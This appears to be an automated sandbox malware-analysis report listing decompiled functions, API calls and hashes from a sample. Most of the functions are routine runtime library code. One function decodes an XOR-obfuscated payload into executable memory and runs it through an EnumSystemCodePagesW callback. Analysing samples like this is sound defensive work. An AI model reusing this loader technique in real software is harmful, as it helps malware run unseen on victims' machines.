                                                        • Opcode ID: a3341522df69caadc8c04ee5c7168d8094e6b8cd2ca5b32baa230ad00c5bf104
                                                        • Instruction ID: 4ff6e06c271ae31320a9a8c990d9df11fcff4c1183c2e4631f0cd89de2c6d58c
                                                        • Opcode Fuzzy Hash: a3341522df69caadc8c04ee5c7168d8094e6b8cd2ca5b32baa230ad00c5bf104
                                                        • Instruction Fuzzy Hash: 89F09032509632ADE239767D7CC16DA2E84EF1177CF20862EE761D8CD1FF2294414795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 008A14C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 64%
                                                        			E008A14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x942088; // 0x75aef0bc
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00897707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E008A13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00897707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00897707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00862340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0086E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                        0x008a14c0
                                                        0x008a14cb
                                                        0x008a14d2
                                                        0x008a14d6
                                                        0x008a14da
                                                        0x008a14de
                                                        0x008a14e3
                                                        0x008a157a
                                                        0x008a157a
                                                        0x008a14f1
                                                        0x008a14f3
                                                        0x008cea0f
                                                        0x00000000
                                                        0x008cea15
                                                        0x00000000
                                                        0x008cea15
                                                        0x008a14f9
                                                        0x008a14f9
                                                        0x008a14fe
                                                        0x008a1504
                                                        0x008cea1a
                                                        0x008cea1f
                                                        0x008cea21
                                                        0x008cea22
                                                        0x008cea27
                                                        0x008cea2a
                                                        0x008cea2a
                                                        0x008a1515
                                                        0x008a1517
                                                        0x008a156d
                                                        0x008a1572
                                                        0x008a1575
                                                        0x008a1575
                                                        0x008a151e
                                                        0x008cea50
                                                        0x008cea55
                                                        0x008cea58
                                                        0x008cea58
                                                        0x008a152e
                                                        0x008a1531
                                                        0x008a1533
                                                        0x00000000
                                                        0x008a1535
                                                        0x008a1541
                                                        0x008a1549
                                                        0x008a1549
                                                        0x008a1533
                                                        0x008a14f3
                                                        0x008a1559

                                                        APIs
                                                        • ___swprintf_l.LIBCMT ref: 008CEA22
                                                          • Part of subcall function 008A13CB: ___swprintf_l.LIBCMT ref: 008A146B
                                                          • Part of subcall function 008A13CB: ___swprintf_l.LIBCMT ref: 008A1490
                                                        • ___swprintf_l.LIBCMT ref: 008A156D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$]:%u
                                                        • API String ID: 48624451-3050659472
                                                        • Opcode ID: cc92d8ec2328f0aa864413295444bc83bc15c5e9656dca28e2289561b514dafc
                                                        • Instruction ID: e644364c94771da54c6eac93dd1c5f7a26548947b63f74372b4729cd20dfdb2a
                                                        • Opcode Fuzzy Hash: cc92d8ec2328f0aa864413295444bc83bc15c5e9656dca28e2289561b514dafc
                                                        • Instruction Fuzzy Hash: 1D21C172D00229ABDF20EE58CC45AEA73BCFB91714F494465FC46D3640DB74EA588BE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013B12B8 Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 69%
                                                        			E013B12B8(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E013B1530(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E013B2752(_t98, _t119, _t119);
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E013B1530(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E013B1CC3())) = 0x22;
												L4:
												E013B1E89();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E013B2873(_t119));
											_t88 = E013B2A2A();
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E013B2897(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E013B1CC3())) = 0x16;
				goto L4;
			}




























                                                        0x013b12c2
                                                        0x013b12c5
                                                        0x013b12cb
                                                        0x013b12ce
                                                        0x013b12d1
                                                        0x013b12ee
                                                        0x00000000
                                                        0x013b12ee
                                                        0x013b12d3
                                                        0x013b12d8
                                                        0x00000000
                                                        0x00000000
                                                        0x013b12dc
                                                        0x013b12f7
                                                        0x013b12fa
                                                        0x013b12fc
                                                        0x013b130a
                                                        0x013b130a
                                                        0x013b130e
                                                        0x013b1316
                                                        0x013b131b
                                                        0x013b131b
                                                        0x013b131e
                                                        0x013b1320
                                                        0x00000000
                                                        0x013b1322
                                                        0x013b1322
                                                        0x013b132a
                                                        0x013b132c
                                                        0x00000000
                                                        0x00000000
                                                        0x013b132e
                                                        0x013b1331
                                                        0x013b1334
                                                        0x013b133b
                                                        0x013b133d
                                                        0x013b1344
                                                        0x013b133f
                                                        0x013b133f
                                                        0x013b133f
                                                        0x013b1349
                                                        0x013b134c
                                                        0x013b134e
                                                        0x013b1437
                                                        0x00000000
                                                        0x013b1354
                                                        0x013b1354
                                                        0x013b1354
                                                        0x013b135b
                                                        0x013b139c
                                                        0x013b139c
                                                        0x013b139e
                                                        0x013b1409
                                                        0x013b140f
                                                        0x013b1412
                                                        0x013b1469
                                                        0x00000000
                                                        0x013b146f
                                                        0x013b1414
                                                        0x013b1417
                                                        0x013b1419
                                                        0x013b143f
                                                        0x013b143f
                                                        0x013b1443
                                                        0x013b144d
                                                        0x013b1452
                                                        0x013b145a
                                                        0x013b12e9
                                                        0x013b12e9
                                                        0x00000000
                                                        0x013b12e9
                                                        0x013b141b
                                                        0x013b141e
                                                        0x013b1421
                                                        0x013b1422
                                                        0x013b1425
                                                        0x013b1425
                                                        0x013b1426
                                                        0x013b1429
                                                        0x013b142c
                                                        0x00000000
                                                        0x013b142c
                                                        0x013b13a0
                                                        0x013b13a2
                                                        0x013b13c6
                                                        0x013b13cb
                                                        0x013b13d1
                                                        0x013b13d3
                                                        0x013b13d3
                                                        0x013b13a4
                                                        0x013b13a6
                                                        0x013b13ac
                                                        0x013b13be
                                                        0x013b13be
                                                        0x013b13be
                                                        0x013b13c0
                                                        0x013b13ae
                                                        0x013b13b3
                                                        0x013b13b5
                                                        0x013b13b5
                                                        0x013b13c2
                                                        0x013b13c2
                                                        0x013b13d5
                                                        0x013b13d8
                                                        0x00000000
                                                        0x013b13da
                                                        0x013b13da
                                                        0x013b13db
                                                        0x013b13e5
                                                        0x013b13e6
                                                        0x013b13eb
                                                        0x013b13ee
                                                        0x013b13f0
                                                        0x013b1477
                                                        0x00000000
                                                        0x013b1477
                                                        0x013b13f6
                                                        0x013b13f9
                                                        0x013b1465
                                                        0x013b1465
                                                        0x013b1465
                                                        0x013b1465
                                                        0x00000000
                                                        0x013b1465
                                                        0x013b13fb
                                                        0x013b13fb
                                                        0x013b13fd
                                                        0x013b13fd
                                                        0x013b1400
                                                        0x013b1403
                                                        0x00000000
                                                        0x013b1403
                                                        0x013b13d8
                                                        0x013b135d
                                                        0x013b1360
                                                        0x013b1363
                                                        0x013b1365
                                                        0x00000000
                                                        0x00000000
                                                        0x013b1367
                                                        0x00000000
                                                        0x00000000
                                                        0x013b136d
                                                        0x013b136f
                                                        0x013b1371
                                                        0x013b1373
                                                        0x013b1373
                                                        0x013b1376
                                                        0x013b1379
                                                        0x013b137b
                                                        0x00000000
                                                        0x013b1381
                                                        0x013b1388
                                                        0x013b138d
                                                        0x013b1390
                                                        0x013b1393
                                                        0x013b1396
                                                        0x013b1398
                                                        0x00000000
                                                        0x013b1398
                                                        0x013b142f
                                                        0x013b142f
                                                        0x013b142f
                                                        0x00000000
                                                        0x013b1354
                                                        0x013b134e
                                                        0x013b1320
                                                        0x013b1303
                                                        0x013b1306
                                                        0x013b1308
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x013b1308
                                                        0x013b12de
                                                        0x013b12e3
                                                        0x00000000

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1033500166.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000006.00000002.1033491986.00000000013B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.1033535506.00000000013BE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.1033548495.00000000013C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.1033567641.00000000013C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                        • String ID:
                                                        • API String ID: 1559183368-0
                                                        • Opcode ID: 55d99c3bc2fc2accb151bd68b8c7c5b1b205c24243914e167072cac61f5e5b14
                                                        • Instruction ID: acacb248b804a03453a91d40d44469e5890e7d70ccea0f1c8cc7e2e41a98c018
                                                        • Opcode Fuzzy Hash: 55d99c3bc2fc2accb151bd68b8c7c5b1b205c24243914e167072cac61f5e5b14
                                                        • Instruction Fuzzy Hash: 2751EA70A013099BDB248F6DE8E05EE7BB5AF40328F148729EB29D6ED0F77499508B41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013B7452 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 95%
                                                        			E013B7452(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0x13c4834, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0x13c4830 == _t7) {
									_t9 = E013B1CC3();
									 *_t9 = E013B1CD6(GetLastError());
									goto L17;
								} else {
									if(E013B1741(_t7, _t31) == 0) {
										_t12 = E013B1CC3();
										 *_t12 = E013B1CD6(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E013B1741(_t6, _t31);
						 *((intOrPtr*)(E013B1CC3())) = 0xc;
						goto L12;
					} else {
						E013B4831(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E013B1147(__ebx, __edx, __edi, _a8);
				}
			}









                                                        0x013b7459
                                                        0x013b7467
                                                        0x013b746c
                                                        0x013b747b
                                                        0x013b74ae
                                                        0x013b7480
                                                        0x013b7482
                                                        0x013b7482
                                                        0x013b748f
                                                        0x013b7495
                                                        0x013b7499
                                                        0x013b74f9
                                                        0x013b74f9
                                                        0x013b749b
                                                        0x013b74a1
                                                        0x013b74e3
                                                        0x013b74f7
                                                        0x00000000
                                                        0x013b74a3
                                                        0x013b74ac
                                                        0x013b74cb
                                                        0x013b74df
                                                        0x013b74c5
                                                        0x013b74c5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x013b74ac
                                                        0x013b74a1
                                                        0x00000000
                                                        0x013b74c7
                                                        0x013b74b4
                                                        0x013b74bf
                                                        0x00000000
                                                        0x013b746e
                                                        0x013b7471
                                                        0x013b7477
                                                        0x013b7477
                                                        0x013b74c8
                                                        0x013b74ca
                                                        0x013b745b
                                                        0x013b7465
                                                        0x013b7465

                                                        APIs
                                                        • _malloc.LIBCMT ref: 013B745E
                                                          • Part of subcall function 013B1147: __FF_MSGBANNER.LIBCMT ref: 013B115E
                                                          • Part of subcall function 013B1147: __NMSG_WRITE.LIBCMT ref: 013B1165
                                                          • Part of subcall function 013B1147: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,013B48C7,00000000,00000000,00000000,00000000,?,013B44F9,00000018,013C2280), ref: 013B118A
                                                        • _free.LIBCMT ref: 013B7471
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1033500166.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000006.00000002.1033491986.00000000013B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.1033535506.00000000013BE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.1033548495.00000000013C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.1033567641.00000000013C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: AllocHeap_free_malloc
                                                        • String ID:
                                                        • API String ID: 2734353464-0
                                                        • Opcode ID: d656b58623f40118e1b26a5e5085a7896989b0954aeb260ebf081a9e9bc256f3
                                                        • Instruction ID: 859dcdae0e9d528b2c7f2f5ac264ad57fc5d2a7282168220c136b21e0d057271
                                                        • Opcode Fuzzy Hash: d656b58623f40118e1b26a5e5085a7896989b0954aeb260ebf081a9e9bc256f3
                                                        • Instruction Fuzzy Hash: C2119431805616AACB313E7CB8D46D93F98EB50369F104525EB49AAEC0FA788940C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013B1000 Relevance: 7.6, APIs: 5, Instructions: 54memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 92%
                                                        			E013B1000(void* __ecx, void* __eflags, intOrPtr _a12) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				intOrPtr _t6;
				void* _t7;
				void* _t18;
				_Unknown_base(*)()* _t19;
				void* _t24;
				void* _t25;
				void* _t26;
				intOrPtr* _t32;

				_push(_t18);
				_t26 = 0;
				_t6 = E013B1147(_t18, _t24, 0, 0x17d78400);
				 *_t32 = 0x13c3000;
				_v8 = _t6;
				_t7 = E013B11D9(_a12, _t25);
				_t19 = VirtualAlloc(0, 0x1487, 0x3000, 0x40);
				E013B147D(_t19, 0x1487, 1, _t7);
				_t10 = _v8;
				if(_v8 != 0) {
					E013B1530(_t10, 0xcb, 0x17d78400);
					do {
						 *((char*)(_t19 + _t26)) = ( *((intOrPtr*)(_t19 + _t26)) + 0x00000001 ^ 0x000000dd) - 0x3b;
						_t26 = _t26 + 1;
					} while (_t26 < 0x1487);
					EnumSystemCodePagesW(_t19, 0);
				}
				return 0;
			}














                                                        0x013b1004
                                                        0x013b100c
                                                        0x013b100e
                                                        0x013b1013
                                                        0x013b101d
                                                        0x013b1020
                                                        0x013b1044
                                                        0x013b1048
                                                        0x013b104d
                                                        0x013b1055
                                                        0x013b1062
                                                        0x013b106a
                                                        0x013b1073
                                                        0x013b1076
                                                        0x013b1077
                                                        0x013b107e
                                                        0x013b107e
                                                        0x013b108a

                                                        APIs
                                                        • _malloc.LIBCMT ref: 013B100E
                                                          • Part of subcall function 013B1147: __FF_MSGBANNER.LIBCMT ref: 013B115E
                                                          • Part of subcall function 013B1147: __NMSG_WRITE.LIBCMT ref: 013B1165
                                                          • Part of subcall function 013B1147: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,013B48C7,00000000,00000000,00000000,00000000,?,013B44F9,00000018,013C2280), ref: 013B118A
                                                          • Part of subcall function 013B11D9: __wfsopen.LIBCMT ref: 013B11E4
                                                        • VirtualAlloc.KERNEL32(00000000,00001487,00003000,00000040), ref: 013B1036
                                                        • __fread_nolock.LIBCMT ref: 013B1048
                                                        • _memset.LIBCMT ref: 013B1062
                                                        • EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 013B107E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1033500166.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000006.00000002.1033491986.00000000013B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.1033535506.00000000013BE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.1033548495.00000000013C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.1033567641.00000000013C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: Alloc$CodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
                                                        • String ID:
                                                        • API String ID: 612201108-0
                                                        • Opcode ID: e970ffc898febc9680fec2f7fe5dc0a3a1cd131c7bfdfc0643763fde97308cae
                                                        • Instruction ID: d33b299ec09634e5aaa5e3fabe5523ab3d0286d94cd664b55446cccf0118649c
                                                        • Opcode Fuzzy Hash: e970ffc898febc9680fec2f7fe5dc0a3a1cd131c7bfdfc0643763fde97308cae
                                                        • Instruction Fuzzy Hash: 370126726043447BF7212A7AAC9BFDF3F5CDB51B5CF100865FB02AA581F9A498019274
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 008853A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 45%
                                                        			E008853A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009401c0;
									_push(_t92);
									_push(0);
									_t37 = L0085F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = L008A4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									L008B3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									L008B3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E008E217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L008B3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									L008A3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00885384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = L0085F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											L008A3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = L0085F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												L008A3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = L0085F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = L008A3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00885329(_t74, _t92);
													_push(1);
													_t48 = E008853A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                        0x008853ab
                                                        0x008853ae
                                                        0x008853b1
                                                        0x008853b4
                                                        0x008853b7
                                                        0x008a05b6
                                                        0x008a05c0
                                                        0x008a05c3
                                                        0x00000000
                                                        0x008a05c9
                                                        0x008a05c9
                                                        0x008a05cc
                                                        0x008a05d5
                                                        0x008a05d5
                                                        0x008853bd
                                                        0x008853bd
                                                        0x008853bd
                                                        0x008853be
